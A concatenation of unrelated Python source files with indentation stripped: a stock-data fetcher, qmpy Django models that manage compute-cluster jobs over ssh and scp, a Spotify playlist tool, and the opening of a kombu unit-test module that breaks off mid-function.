now = dtime.datetime.now()
deltalist = [dtime.timedelta(days=-x*30) for x in range(36)]
n_days = [ now + delta for delta in deltalist]
time_list = [ x.strftime('%Y-%m') for x in n_days ]
q_list = [self.__date_to_q(x) for x in time_list]
return set(q_list)
def __update_report_data(self,year,index):
try:
data1 = ts.get_report_data(year,index)
data2 = ts.get_profit_data(year,index)
data3 = ts.get_operation_data(year,index)
data4 = ts.get_growth_data(year,index)
data5 = ts.get_debtpaying_data(year,index)
data6 = ts.get_cashflow_data(year,index)
self.store['report_data_'+str(year)+'_'+str(index)] = data1
self.store['profit_data_'+str(year)+'_'+str(index)] = data2
self.store['operation_data_'+str(year)+'_'+str(index)] = data3
self.store['growth_data_'+str(year)+'_'+str(index)] = data4
self.store['debtpaying_data_'+str(year)+'_'+str(index)] = data5
self.store['cashflow_data_'+str(year)+'_'+str(index)] = data6
except Exception as e:
print("update report data failed year="+str(year)+" q"+str(index)+" e="+str(e))
def __update_hs300_sharelist(self):
print("更新hs300数据")
data = ts.get_hs300s()
if not isinstance(data,pd.DataFrame):
data = pd.DataFrame()
self.store['hs300_share_list'] = data
"""
Fetch stock data for every code in the given list
"""
def __update_share_history_data_by_codes(self,codes):
for code in codes:
self.updateAllShareHistoryDataCount += 1
self.update_share_history_data(code)
self.__log("finish "+str(self.updateAllShareHistoryDataCount)+"/"+str(self.updateAllShareHistoryDataSum))
def __update_share_list_from_internet(self):
self.__log("updata share list form internet")
data = ts.get_stock_basics()
self.store['all_share_list'] = data
def __formatInputCode(self,code):
#pad numeric stock codes with leading zeros to the standard 6 digits
return str(code).zfill(6)
def __log(self,msg):
print("DataBase:"+msg)
def __init__(self):
self.__log("---init---")
self.store = pd.HDFStore("hdf_store.hd5")
self.__log('---init end---')
#print(self.store)
def __del__(self):
self.__log("---del---")
if self.store.is_open:
self.__log("close store")
self.store.close()
if __name__ == "__main__":
dataBase = DataBase()
dataBase.update_all_report_data()
#dataBase.update_all()
#print(dataBase.get_hs300_sharelist())
#dataBase._makeLocalShareDataPath(100)
#data = dataBase.get_share_history_data(300024,'2017-07-03','2017-06-03')
#dataBase.update_all_share_history_data()
#data = ts.get_hist_data('399300')
#print(data)
#print(dataBase.get_hs300_info())
|
resources.py
|
from datetime import datetime, timedelta
import time
import random
import subprocess
import os
import os.path
from collections import defaultdict
import json
import logging
import numbers
import yaml
from django.db import models
from django.contrib.auth.models import AbstractUser
import pexpect, getpass
import qmpy
from qmpy.db.custom import DictField
import queue
import threading
logger = logging.getLogger(__name__)
def is_yes(string):
if not string:
return None
char = string.lower()[0]
if char == 'n':
return False
if char == 'y':
return True
return None
class AllocationError(Exception):
"""Problem with the allocation"""
class SubmissionError(Exception):
"""Failed to submit a job"""
class User(AbstractUser):
"""
User model - stores an oqmd users information.
Relationships:
| :mod:`~qmpy.Account` via account_set
| :mod:`~qmpy.Allocation` via allocation_set
| :mod:`~qmpy.Project` via project_set
Attributes:
| id
| username
| first_name
| last_name
| date_joined
| is_active
| is_staff
| is_superuser
| last_login
| email
"""
class Meta:
app_label = 'qmpy'
db_table = 'users'
@property
def running(self):
return queue.Job.objects.filter(account__user=self, state=1)
@classmethod
def get(cls, name):
try:
return cls.objects.get(username=name)
except cls.DoesNotExist:
return cls(username=name)
@staticmethod
def create():
username = raw_input("Username: ")
email = raw_input("E-mail address: ")
user, new = User.objects.get_or_create(username=username)
if not new:
print 'User by that name exists!'
print 'Please try a new name, or exit with Ctrl-x'
return User.create()
print 'Okay, user created!'
user.save()
user.create_accounts()
#user.assign_allocations()
return user
def create_accounts(self):
msg = 'Would you like to create cluster accounts for this user?'
ans = is_yes(raw_input(msg+' [y/n]: '))
if ans is False:
return
elif ans is None:
print "I didn't understand that command."
return self.create_accounts()
msg = 'Does user %s have an account on %s? [y/n]: '
msg2 = 'What is %s\'s username on %s?: '
msg3 = 'On %s@%s where should calculations be run? (absolute path): '
known = self.account_set.values_list('host__name', flat=True)
for host in Host.objects.exclude(name__in=known):
ans = raw_input(msg % (self.username, host.name))
ans = is_yes(ans)
if ans is False:
continue
uname = raw_input(msg2 % (self.username, host.name))
acct, new = Account.objects.get_or_create(user=self, host=host)
if not new:
print 'Account exists!'
continue
path = raw_input(msg3 % (self.username, host.name))
acct.run_path = path
acct.username = uname.strip()
acct.save()
acct.create_passwordless_ssh()
class Host(models.Model):
"""
Host model - stores all host information for a cluster.
Relationships:
| account
| allocation
Attributes:
| name: Primary key.
| binaries: dict of label:path pairs for vasp binaries.
| check_queue: Path to showq command
| checked_time: datetime object for the last time the queue was
| checked.
| hostname: Full host name.
| ip_address: Full ip address.
| nodes: Total number of nodes.
| ppn: Number of processors per node.
| running: dict of PBS_ID:state pairs.
| sub_script: Path to qsub command
| sub_text: Path to queue file template.
| utilization: Number of active cores (based on showq).
| walltime: Maximum walltime on the machine.
| state: State code. 1=Up, 0=Full (auto-resets to 1 when jobs are
| collected), -1=Down.
"""
name = models.CharField(max_length=63, primary_key=True)
ip_address = models.IPAddressField(null=True)
hostname = models.CharField(max_length=255)
binaries = DictField()
ppn = models.IntegerField(default=8)
nodes = models.IntegerField(default=30)
walltime = models.IntegerField(default=3600*24)
sub_script = models.CharField(max_length=120, default='/usr/local/bin/qsub')
sub_text = models.TextField()
check_queue = models.CharField(max_length=180,
default='/usr/local/maui/bin/showq')
checked_time = models.DateTimeField(default=datetime.min)
running = DictField()
utilization = models.IntegerField(default=0)
state = models.IntegerField(default=1)
class Meta:
app_label = 'qmpy'
db_table = 'hosts'
def __str__(self):
return self.name
@staticmethod
def create():
"""
Classmethod to create a Host model. Script will ask you questions about
the host to add, and will return the created Host.
"""
host = {}
host['name'] = raw_input('Hostname:')
if Host.objects.filter(name=host['name']).exists():
print 'Host by that name already exists!'
exit(-1)
host['ip_address'] = raw_input('IP Address:')
if Host.objects.filter(ip_address=host['ip_address']).exists():
print 'Host at that address already exists!'
exit(-1)
host['ppn'] = raw_input('Processors per node:')
host['nodes'] = raw_input('Max nodes to run on:')
host['sub_script'] = raw_input('Command to submit a script '
'(e.g. /usr/local/bin/qsub):')
host['check_queue'] = raw_input('Command for showq (e.g.'
'/usr/local/maui/bin/showq):')
host['sub_text'] = raw_input('Path to qfile template:')
h = Host(**host)
h.save()
@classmethod
def get(cls, name):
try:
return cls.objects.get(name=name)
except cls.DoesNotExist:
return cls(name=name)
@property
def accounts(self):
return list(self.account_set.all())
@property
def jobs(self):
jobs = []
for acct in self.accounts:
jobs += list(acct.job_set.filter(state=1))
return jobs
@property
def active(self):
if self.state < 1:
return False
elif self.utilization > 5*self.nodes*self.ppn:
return False
else:
return True
@property
def percent_utilization(self):
return 100. * float(self.utilization) / (self.nodes*self.ppn)
def get_utilization(self):
util = 0
for acct in self.account_set.all():
for job in acct.job_set.filter(state=1):
util += job.ncpus
self.utilization = util
return util
def get_project(self):
"""
Out of the active projects able to run on this host,
select one at random
Output:
Project, Active project able to run on this host
"""
proj = Project.objects.filter(allocations__host=self, state=1)
proj = proj.filter(task__state=0)
if proj.exists():
return random.choice(list(proj.distinct()))
def get_tasks(self, project=None):
tasks = queue.Task.objects.filter(state=0)
if project is None:
project = self.get_project()
if project is None:
return
tasks = tasks.filter(project_set=project)
tasks = tasks.filter(project_set__allocations__host=self)
tasks = tasks.filter(project_set__users__account__host=self)
return tasks.order_by('priority', 'id')
@property
def qfile(self):
return open(self.sub_text).read()
def get_binary(self, key):
return self.binaries[key]
def _try_login(self, timeout=5.0):
def _login():
self._tmp_acct = Allocation.get('b1004').get_account()
self._tmp_ssh = 'ssh {user}@{host} "{cmd}"'.format(
user=self._tmp_acct.user.username,
host=self._tmp_acct.host.ip_address,
cmd='whoami')
self._tmp_proc = subprocess.Popen(self._tmp_ssh, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = self._tmp_proc.communicate()
if stdout.strip() == self._tmp_acct.user.username:
print "quest is up"
self._tmp_thread = threading.Thread(target=_login)
self._tmp_thread.start()
self._tmp_thread.join(timeout)
if self._tmp_thread.is_alive():
print "unable login on quest"
self._tmp_proc.terminate()
self._tmp_thread.join()
return self._tmp_proc.returncode
def check_host(self):
"""Pings the host to see if it is online. Returns False if it is
offline."""
ret = subprocess.call("ping -c 1 -w 1 %s" % self.ip_address,
shell=True,
stdout=open('/dev/null', 'w'),
stderr=subprocess.STDOUT)
if ret == 0:
self.state = 1
self.save()
write_resources()
return True
else:
"""Sometimes quest refuses to respond to ping requests. So, try
logging into it using an(y) account. Trying executing a command and
see if it is successful."""
if self.name == 'quest':
if self._try_login() == 0:
self.state = 1
self.save()
write_resources()
return True
self.state = -2
self.save()
return False
@property
def running_now(self):
if not self.state == 1:
return {}
if datetime.now() + timedelta(seconds=-60) > self.checked_time:
self.check_running()
return self.running
def check_running(self):
"""
Uses the host's data and one of the associated accounts to check the PBS
queue on the Host. If it was checked within the last minute, running_now
reuses the previously cached result instead of calling this again.
"""
self.checked_time = datetime.now()
if not self.state == 1:
self.running = {}
self.save()
return
account = random.choice(self.accounts)
raw_data = account.execute(self.check_queue)
running = {}
if not raw_data:
return
for line in raw_data.split('\n'):
if 'Active Jobs' in line:
continue
line = line.split()
if len(line) != 9:
continue
try:
# < Mohan
if 'Moab' in line[0]:
qid = int(line[0].strip().split('.')[1])
else:
qid = int(line[0])
running[qid] = {
'user':line[1],
'state':line[2],
'proc':int(line[3])}
# Mohan >
except (ValueError, IndexError):
pass
self.running = running
self.save()
def get_running(self):
if self.running is not None:
return self.running
else:
return {}
def activate(self):
"""
Allow jobs to be run on this system. Remember to save() to enact change
"""
self.state = 1
def deactivate(self):
"""
Prevent new jobs from being started on this system.
Remember to save() changes
"""
self.state = -1
@property
def utilization_by_project(self):
utilization = defaultdict(int)
for job in self.jobs:
projects = job.task.project_set.all()
for p in projects:
utilization[str(p.name)] += float(job.ncpus)/len(projects)
if self.ppn*self.nodes > sum(utilization.values()):
utilization["Idle"] = self.ppn*self.nodes - sum(utilization.values())
return utilization
@property
def utilization_json(self):
series = []
for k, v in self.utilization_by_project.items():
series.append({'data':v, 'label':k})
return json.dumps(series)
@property
def ncpus(self):
return self.ppn * self.nodes
#===============================================================================#
class Account(models.Model):
"""
Base class for a `User` account on a `Host`.
Attributes:
| host
| id
| job
| run_path
| state
| user
| username
"""
user = models.ForeignKey(User)
host = models.ForeignKey(Host)
username = models.CharField(max_length=255)
run_path = models.TextField()
state = models.IntegerField(default=1)
class Meta:
app_label = 'qmpy'
db_table = 'accounts'
def __str__(self):
return '{user}@{host}'.format(user=self.user.username,
host=self.host.name)
@classmethod
def get(cls, user, host):
try:
return Account.objects.get(user=user, host=host)
except cls.DoesNotExist:
return Account(host=host, user=user)
def create_passwordless_ssh(self, key='id_dsa', origin=None):
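# Pushes the local key to the remote authorized_keys in four password-driven
# steps (touch the file, scp the key, chmod it, ssh-copy-id), then verifies
# with a passwordless 'whoami'.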
msg = 'password for {user}@{host}: '
if origin is None:
origin = '/home/{user}/.ssh'.format(user=getpass.getuser())
pas = getpass.getpass(msg.format(user=self.username, host=self.host.name))
msg = '/usr/bin/ssh {user}@{host} touch'
msg += ' /home/{user}/.ssh/authorized_keys'
p = pexpect.spawn(msg.format(
origin=origin, key=key,
user=self.username, host=self.host.ip_address))
p.expect('assword:')
p.sendline(pas)
time.sleep(2)
p.close()
msg = '/usr/bin/scp {origin}/{key} {user}@{host}:/home/{user}/.ssh/'
p = pexpect.spawn(msg.format(
origin=origin, key=key,
user=self.username, host=self.host.ip_address))
p.expect('assword:')
p.sendline(pas)
time.sleep(2)
p.close()
msg = '/usr/bin/ssh {user}@{host}'
msg += ' chmod 600 /home/{user}/.ssh/authorized_keys'
p = pexpect.spawn(msg.format(
origin=origin, key=key,
user=self.username, host=self.host.ip_address))
p.expect('assword:')
p.sendline(pas)
time.sleep(2)
p.close()
msg = '/usr/bin/ssh-copy-id -i {origin}/{key} {user}@{host}'
p = pexpect.spawn(msg.format(
origin=origin, key=key,
user=self.username, host=self.host.ip_address))
p.expect('assword:')
p.sendline(pas)
time.sleep(2)
p.close()
print "Great! Let's test it real quick..."
out = self.execute('whoami')
if out == '%s\n' % self.username:
print 'Awesome! It worked!'
else:
print 'Something appears to be wrong, talk to Scott...'
@property
def active(self):
if self.state < 1:
return False
elif not self.host.active:
return False
else:
return True
def submit(self, path=None, run_path=None, qfile=None):
self.execute('mkdir %s' % run_path, ignore_output=True)
self.copy(folder=path, file='*', destination=run_path)
cmd = 'command cd {path} && {sub} {qfile}'.format(
path=run_path,
sub=self.host.sub_script,
qfile=qfile)
stdout = self.execute(cmd)
# < Mohan
tmp = stdout.strip().split()[0]
if 'Moab' in tmp:
jid = int(tmp.split('.')[1])
else:
jid = int(tmp.split('.')[0])
# Mohan >
return jid
def execute(self, command='exit 0', ignore_output=False):
ssh = 'ssh {user}@{host} "{cmd}"'.format(
user=self.username,
host=self.host.ip_address,
cmd=command)
logging.debug(ssh)
call = subprocess.Popen(ssh, shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout,stderr = call.communicate()
logging.debug('stdout: %s', stdout)
logging.debug('stderr: %s', stderr)
if stderr and not ignore_output:
logging.warn('WARNING: %s', stderr)
return stdout
def copy(self, destination=None, to=None, # where to send the stuff
fr=None, file=None, folder=None, # what to send
clear_dest_dir=False, move=False): # some conditions on sending it
if destination is None:
destination = self.run_path
if to is None:
to = self
if fr is None:
if to == 'local':
fr = self
else:
fr = 'local'
assert (isinstance(to, Account) or to == 'local')
assert (isinstance(fr, Account) or fr == 'local')
assert ( not (file is None and folder is None) )
send_dir = False
if file is None:
send_dir = True
elif folder is None:
folder = os.path.dirname(file)
file = os.path.basename(file)
if clear_dest_dir:
if to == 'local':
command = subprocess.Popen('rm -f %s/*' % destination,
shell=True,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE)
stdout, stderr = command.communicate()
else:
stdout = self.execute('rm -f %s/*' % destination)
logging.debug('stdout: %s', stdout)
if fr == 'local':
scp = 'scp '
else:
scp = 'scp {user}@{host}:'.format(
user=fr.username, host=fr.host.ip_address)
if not file:
scp += '-r '
if send_dir:
scp += os.path.abspath(folder)
else:
scp += '{path}/{file}'.format(
path=os.path.abspath(folder), file=file)
if to == 'local':
scp += ' '+destination
else:
scp += ' {user}@{host}:{path}'.format(
user=to.username, host=to.host.ip_address,
path=os.path.abspath(destination))
logging.debug('copy command: %s', scp)
cmd = subprocess.Popen(scp,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = cmd.communicate()
logging.debug('stdout: %s', stdout)
logging.debug('stderr: %s', stderr)
if move:
if send_dir:
rmcmd = 'rm -rf {path}'.format(path=os.path.abspath(folder))
else:
rmcmd = 'rm -f {path}/{file}'.format(file=file,
path=os.path.abspath(folder))
logging.debug('wiping source: %s', rmcmd)
stdout = fr.execute(rmcmd)
logging.debug('output: %s', stdout)
#===============================================================================#
class Allocation(models.Model):
"""
Base class for an Allocation on a computing resources.
Attributes:
| host
| job
| key
| name
| project
| state
| users
"""
name = models.CharField(max_length=63, primary_key=True)
key = models.CharField(max_length=100, default='')
host = models.ForeignKey(Host)
users = models.ManyToManyField(User)
state = models.IntegerField(default=1)
class Meta:
app_label = 'qmpy'
db_table = 'allocations'
def __str__(self):
return self.name
@classmethod
def create(self):
name = raw_input('Name your allocation:')
if Allocation.objects.filter(name=name).exists():
print 'Allocation by that name already exists!'
exit(-1)
host = raw_input('Which cluster is this allocation on?')
if not Host.objects.filter(name=host).exists():
print "This host doesn't exist!"
exit(-1)
host = Host.objects.get(name=host)
alloc = Allocation(name=name, host=host)
alloc.save()
print 'Now we will assign users to this allocation'
for acct in Account.objects.filter(host=host):
inc = raw_input('Can %s use this allocation? y/n [y]:' %
acct.user.username )
if inc == 'y' or inc == '':
alloc.users.add(acct.user)
print 'If this allocation requires a special password, enter',
key = raw_input('it now:')
alloc.key=key
alloc.save()
@classmethod
def get(cls, name):
try:
return cls.objects.get(name=name)
except cls.DoesNotExist:
return cls(name=name)
@property
def active(self):
if self.state < 1:
return False
elif not self.host.active:
return False
else:
return True
def get_user(self):
return random.choice(self.users.filter(state=1))
def get_account(self, users=None):
if users is None:
users = self.users.all()
user = random.choice(list(users))
return user.account_set.get(host=self.host)
@property
def percent_utilization(self):
return self.host.percent_utilization
#===============================================================================#
class Project(models.Model):
"""
Base class for a project within qmpy.
Attributes:
| allocations
| entry
| name
| priority
| state
| task
| users
"""
name = models.CharField(max_length=63, primary_key=True)
priority = models.IntegerField(default=0)
users = models.ManyToManyField(User)
allocations = models.ManyToManyField(Allocation)
state = models.IntegerField(default=1)
class Meta:
app_label = 'qmpy'
db_table = 'projects'
def __str__(self):
return self.name
@classmethod
def get(cls, name):
if isinstance(name, cls):
return name
try:
return cls.objects.get(name=name)
except cls.DoesNotExist:
return cls(name=name)
@property
def completed(self):
return self.task_set.filter(state=2)
@property
def running(self):
return self.task_set.filter(state=1)
@property
def waiting(self):
return self.task_set.filter(state=0).order_by('priority')
@property
def failed(self):
return self.task_set.filter(state=-1)
@staticmethod
def create():
'''
Create a new project. Prompts user on std-in
for name, users, and allocations of this project.
'''
name = raw_input('Name your project: ')
if Project.objects.filter(name=name).exists():
print 'Project by that name already exists!'
exit(-1)
proj = Project(name=name)
proj.save()
proj.priority = int(raw_input('Project priority (1-100): '))
users = raw_input('List project users (e.g. sjk648 jsaal531 bwm291): ')
for u in users.split():
if not User.objects.filter(username=u).exists():
print 'User named', u, 'doesn\'t exist!'
else:
proj.users.add(User.objects.get(username=u))
alloc = raw_input('List project allocations (e.g. byrd victoria b1004): ')
for a in alloc.split():
if not Allocation.objects.filter(name=a).exists():
print 'Allocation named', a, 'doesn\'t exist!'
else:
proj.allocations.add(Allocation.objects.get(name=a))
@property
def active(self):
if self.state < 0:
return False
else:
if self.state != 1:
self.state = 1
self.save()
return True
def get_allocation(self):
available = [ a for a in self.allocations.all() if a.active ]
if available:
return random.choice(available)
else:
return []
# !vih
def write_resources():
current_loc = os.path.dirname(__file__)
######
# headers for various configuration files
######
hosts_header = """# host1:
# binaries:
# bin_name1: /path/to/bin1
# bin_name2: /path/to/bin2
# check_queue: /full/path/to/showq
# hostname: full.host.name
# ip_address: ###.###.##.###
# nodes: # of nodes on machine
# ppn: # of processors per node
# sub_script: /full/path/to/submission/command
# sub_text: filename for qfile to use a template.
# A file named "filename" must be in configuration/qfiles
# walltime: maximum walltime, in seconds
# host2: ...
"""
f_hosts = open(current_loc+'/../configuration/resources/hosts.yml', 'w')
f_hosts.write(hosts_header)
f_hosts.write('\n')
users_header = """# user1:
# hostname1:
# run_path:/where/to/run/on/host1
# username: usernameonhost1
# hostname2:
# run_path:/where/to/run/on/host2
# username: usernameonhost2
# user2:
# hostname1: ...
"""
f_users = open(current_loc+'/../configuration/resources/users.yml', 'w')
f_users.write(users_header)
f_users.write('\n')
allocations_header = """# allocation1:
# host: hostname
# key: key needed for identifying allocation
# users:
# - user1
# - user2
# allocation2: ...
"""
f_allocations = open(current_loc+'/../configuration/resources/allocations.yml', 'w')
f_allocations.write(allocations_header)
f_allocations.write('\n')
projects_header = """# project1:
# allocations:
# - allocation1
# - allocation2
# priority: Base priority for the project. Lower numbers will be done soonest.
# users:
# - user1
# - user2
# project2: ...
"""
f_projects = open(current_loc+'/../configuration/resources/projects.yml', 'w')
f_projects.write(projects_header)
f_projects.write('\n')
######
# list of values that need to be written into the configuration files
######
host_values = ['binaries', 'check_queue', 'hostname', 'ip_address', \
'nodes', 'ppn', 'sub_script', 'sub_text', 'walltime']
user_values = ['run_path', 'username']
allocation_values = ['host', 'key', 'users']
project_values = ['allocations', 'priority', 'users']
######
# a function to 'clean' the values from type unicode/ long/ etc. to string/ int
######
def clean(val):
if isinstance(val, unicode):
val = str(val)
elif isinstance(val, numbers.Number):
val = int(val)
return val
######
# write host configurations into hosts.yml
######
hosts = Host.objects.all()
dict1 = {}
for h in hosts:
dict2 = {}
for hv in host_values:
dict2[hv] = clean(h.__getattribute__(hv))
dict1[clean(h.name)] = dict2
yaml.dump(dict1, f_hosts, default_flow_style=False)
######
# write user configurations into users.yml
######
users = User.objects.all()
dict1 = {}
for u in users:
dict2 = {}
accounts = Account.objects.filter(user=u)
for a in accounts:
dict2[clean(a.host.name)] = {'run_path':clean(a.run_path), \
'username':clean(a.username)}
dict1[clean(u.username)] = dict2
yaml.dump(dict1, f_users, default_flow_style=False)
######
# write allocation configurations into allocations.yml
######
alloc = Allocation.objects.all()
dict1 = {}
for a in alloc:
dict2 = {}
dict2['host'] = clean(a.host.name)
dict2['key'] = clean(a.key)
dict2['users'] = [ clean(u) for u in a.users.all().values_list('username', flat=True) ]
dict1[clean(a.name)] = dict2
yaml.dump(dict1, f_allocations, default_flow_style=False)
######
# write project configurations into projects.yml
######
pro = Project.objects.all()
dict1 = {}
for p in pro:
dict2 = {}
dict2['allocations'] = [ clean(a) for a in p.allocations.all().values_list('name', flat=True) ]
dict2['priority'] = clean(p.priority)
dict2['users'] = [ clean(u) for u in p.users.all().values_list('username', flat=True) ]
dict1[clean(p.name)] = dict2
yaml.dump(dict1, f_projects, default_flow_style=False)
# close the configuration files so all output is flushed to disk
f_hosts.close()
f_users.close()
f_allocations.close()
f_projects.close()
|
randomizer.py
|
import spotipy
import os
import spotipy.util as util
from http.server import HTTPServer, BaseHTTPRequestHandler
from threading import Thread
import requests
os.environ["SPOTIPY_CLIENT_ID"] = ""
os.environ["SPOTIPY_CLIENT_SECRET"] = ""
os.environ["USER"] = ""
SERVER_PORT = 14523
os.environ["SPOTIPY_REDIRECT_URI"] = "http://localhost:{}".format(SERVER_PORT)
scope = 'user-library-read playlist-read-private playlist-read-collaborative playlist-modify-private playlist-modify-public user-follow-read'
class FailedAuth(Exception):
"""Raised when Spotify authentication fails."""
def __init__(self, message):
self.message = message
def __str__(self):
return repr(self.message)
class NotFound(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return repr(self.message)
class MyHTTPHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write('<html><body><h1 style="text-align:center">Great! Now go back to the python program and insert the URL of this page:</h1><button onclick="copy()" style="margin: 0 auto;display:block">Copy to clipboard</button><textarea id="textarea" style="display: block; margin: 0 auto; width: 60%"></textarea><script>var txt = document.getElementById("textarea"); txt.value = window.location.href;txt.select();function copy() {txt.select();document.execCommand("copy");}</script></body></html>'.encode('utf-8'))
def log_message(self, format, *args):
return
class StoppableSilentHTTPServer(HTTPServer):
stopped = False
def __init__(self, *args, **kw):
HTTPServer.__init__(self, *args, **kw)
def serve_forever(self):
while not self.stopped:
self.handle_request()
def force_stop(self):
self.stopped = True
# Ensure a last run of the thread so it can exit
requests.get(url='http://localhost:{}'.format(SERVER_PORT))
self.server_close()
class SpotifyAuth:
def __init__(self, username):
self._username = username
self._sp = None
self.httpd = None
def wait_for_auth(self):
self.httpd = StoppableSilentHTTPServer(('', SERVER_PORT), MyHTTPHandler)
Thread(target=self.httpd.serve_forever).start()
token = util.prompt_for_user_token(self._username, scope)
if token:
self._sp = spotipy.Spotify(auth=token)
else:
raise FailedAuth("Could not get a Spotify token for user '{}'".format(self._username))
def get_spotify(self):
return self._sp
def stop_server(self):
self.httpd.force_stop()
def __list_add_tracks__(list_object, tracks):
for item in tracks["items"]:
track = item["track"]
if track["id"] is not None:
list_object.append(track["id"])
return list_object
def __list_add_artist_tracks__(list_object, tracks):
for track in tracks:
if track["id"] is not None:
list_object.append(track["id"])
return list_object
def __add_playlist__(playlist_list, playlists):
for item in playlists["items"]:
playlist_list.append(item)
return playlist_list
def __add_artist__(artist_list, artists):
for item in artists["items"]:
artist_list.append(item)
return artist_list
def __chunk_list__(data, size):
return [data[x:x + size] for x in range(0, len(data), size)]
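# For example (a quick sketch): __chunk_list__([1, 2, 3, 4, 5], 2) returns
# [[1, 2], [3, 4], [5]]; the randomizer below uses it to send track ids to the
# Spotify API in batches of 20.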
class SpotifyArtistRandomizer:
""""Randomizes a playlist in spotify"""
def __init__(self, username, sp):
self._username = username
self._sp = sp
self._playlist = None
self._artist = None
self._random_playlist_name = "{} (Randomized)"
def set_playlist_by_name(self, name):
self._playlist = self.__find_playlist__(name)
if self._playlist is None:
raise NotFound("No playlist found")
def __find_playlist__(self, name):
playlists = self.get_all_playlists()
for item in playlists:
if item["name"] == name:
return item
return None
def get_playlist_tracks(self, playlist=None):
if playlist is None:
playlist = self._playlist
track_list = []
result = self._sp.user_playlist(self._username, playlist["id"], fields="tracks,next")
tracks = result["tracks"]
track_list = __list_add_tracks__(track_list, tracks)
while tracks["next"]:
tracks = self._sp.next(tracks)
track_list = __list_add_tracks__(track_list, tracks)
return track_list
def get_artist_tracks(self, artist):
track_list = []
result = self._sp.artist_top_tracks(artist["uri"], country='US')
tracks = result["tracks"]
track_list = __list_add_artist_tracks__(track_list, tracks)
return track_list
def __remove_all_tracks__(self, playlist=None):
if playlist is None and self._playlist is not None:
playlist = self._playlist
elif self._playlist is None:
return
tracks = self.get_playlist_tracks(playlist)
for chunk in __chunk_list__(tracks, 20):
self._sp.user_playlist_remove_all_occurrences_of_tracks(self._username, playlist["id"], chunk)
def __create_artist_playlist__(self):
name = "Top 10 Tracks of followed Artists"
self._playlist = self.__find_playlist__(name)
if self._playlist is None:
self._playlist = self._sp.user_playlist_create(self._username,
name,
False)
return
def get_playlist_size(self, playlist=None):
if playlist is not None:
return playlist["tracks"]["total"]
elif self._playlist is not None:
return self._playlist["tracks"]["total"]
def add_tracks_to_playlist(self, tracks, playlist=None):
if playlist is None and self._playlist is not None:
playlist = self._playlist
elif self._playlist is None:
return
for chunk in __chunk_list__(tracks, 20):
self._sp.user_playlist_add_tracks(self._username, playlist["id"], chunk)
def top10_artist_tracks_playlist(self):
self.__create_artist_playlist__()
if self.get_playlist_size() > 0:
self.__remove_all_tracks__()
track_list = []
artists = self.get_all_artists()
for artist in artists:
track_list += self.get_artist_tracks(artist)
self.add_tracks_to_playlist(track_list)
def get_all_playlists(self):
playlist_list = []
playlists = self._sp.user_playlists(self._username)
__add_playlist__(playlist_list, playlists)
while playlists["next"]:
playlists = self._sp.next(playlists)
__add_playlist__(playlist_list, playlists)
return playlist_list
def get_all_artists(self):
artist_list = []
artists = self._sp.current_user_followed_artists()["artists"]
__add_artist__(artist_list, artists)
while artists["next"]:
artists = self._sp.next(artists)["artists"]
__add_artist__(artist_list, artists)
return artist_list
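# A minimal usage sketch (assumes the SPOTIPY_* variables above are filled in
# with real credentials; the username is hypothetical):
#
# auth = SpotifyAuth("myuser")
# auth.wait_for_auth()  # starts the local HTTP server and prompts for a token
# randomizer = SpotifyArtistRandomizer("myuser", auth.get_spotify())
# randomizer.top10_artist_tracks_playlist()  # (re)builds the top-tracks playlist
# auth.stop_server()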
|
test_common.py
|
from __future__ import annotations
import socket
from typing import TYPE_CHECKING
from unittest.mock import Mock, patch
import pytest
from amqp import RecoverableConnectionError
from kombu import common
from kombu.common import (PREFETCH_COUNT_MAX, Broadcast, QoS, collect_replies,
declaration_cached, generate_oid, ignore_errors,
maybe_declare, send_reply)
from t.mocks import ContextMock, MockPool
if TYPE_CHECKING:
from types import TracebackType
def test_generate_oid():
from uuid import NAMESPACE_OID
instance = Mock()
args = (1, 1001, 2001, id(instance))
ent = '%x-%x-%x-%x' % args
with patch('kombu.common.uuid3') as mock_uuid3, \
patch('kombu.common.uuid5') as mock_uuid5:
mock_uuid3.side_effect = ValueError
mock_uuid3.return_value = 'uuid3-6ba7b812-9dad-11d1-80b4'
mock_uuid5.return_value = 'uuid5-6ba7b812-9dad-11d1-80b4'
oid = generate_oid(1, 1001, 2001, instance)
mock_uuid5.assert_called_once_with(NAMESPACE_OID, ent)
assert oid == 'uuid5-6ba7b812-9dad-11d1-80b4'
def test_ignore_errors():
connection = Mock()
connection.channel_errors = (KeyError,)
connection.connection_errors = (KeyError,)
with ignore_errors(connection):
raise KeyError()
def raising():
raise KeyError()
ignore_errors(connection, raising)
connection.channel_errors = connection.connection_errors = ()
with pytest.raises(KeyError):
with ignore_errors(connection):
raise KeyError()
class test_declaration_cached:
def test_when_cached(self):
chan = Mock()
chan.connection.client.declared_entities = ['foo']
assert declaration_cached('foo', chan)
def test_when_not_cached(self):
chan = Mock()
chan.connection.client.declared_entities = ['bar']
assert not declaration_cached('foo', chan)
class test_Broadcast:
def test_arguments(self):
with patch('kombu.common.uuid',
return_value='test') as uuid_mock:
q = Broadcast(name='test_Broadcast')
uuid_mock.assert_called_with()
assert q.name == 'bcast.test'
assert q.alias == 'test_Broadcast'
assert q.auto_delete
assert q.exchange.name == 'test_Broadcast'
assert q.exchange.type == 'fanout'
q = Broadcast('test_Broadcast', 'explicit_queue_name')
assert q.name == 'explicit_queue_name'
assert q.exchange.name == 'test_Broadcast'
q2 = q(Mock())
assert q2.name == q.name
with patch('kombu.common.uuid',
return_value='test') as uuid_mock:
q = Broadcast('test_Broadcast',
'explicit_queue_name',
unique=True)
uuid_mock.assert_called_with()
assert q.name == 'explicit_queue_name.test'
q2 = q(Mock())
assert q2.name.split('.')[0] == q.name.split('.')[0]
class test_maybe_declare:
def _get_mock_channel(self):
# Given: A mock Channel with mock'd connection/client/entities
channel = Mock()
channel.connection.client.declared_entities = set()
return channel
def _get_mock_entity(self, is_bound=False, can_cache_declaration=True):
# Given: An unbound mock Entity (binds to the channel when bind() is called)
entity = Mock()
entity.can_cache_declaration = can_cache_declaration
entity.is_bound = is_bound
def _bind_entity(channel):
entity.channel = channel
entity.is_bound = True
return entity
entity.bind = _bind_entity
return entity
def test_cacheable(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is already bound
entity = self._get_mock_entity(
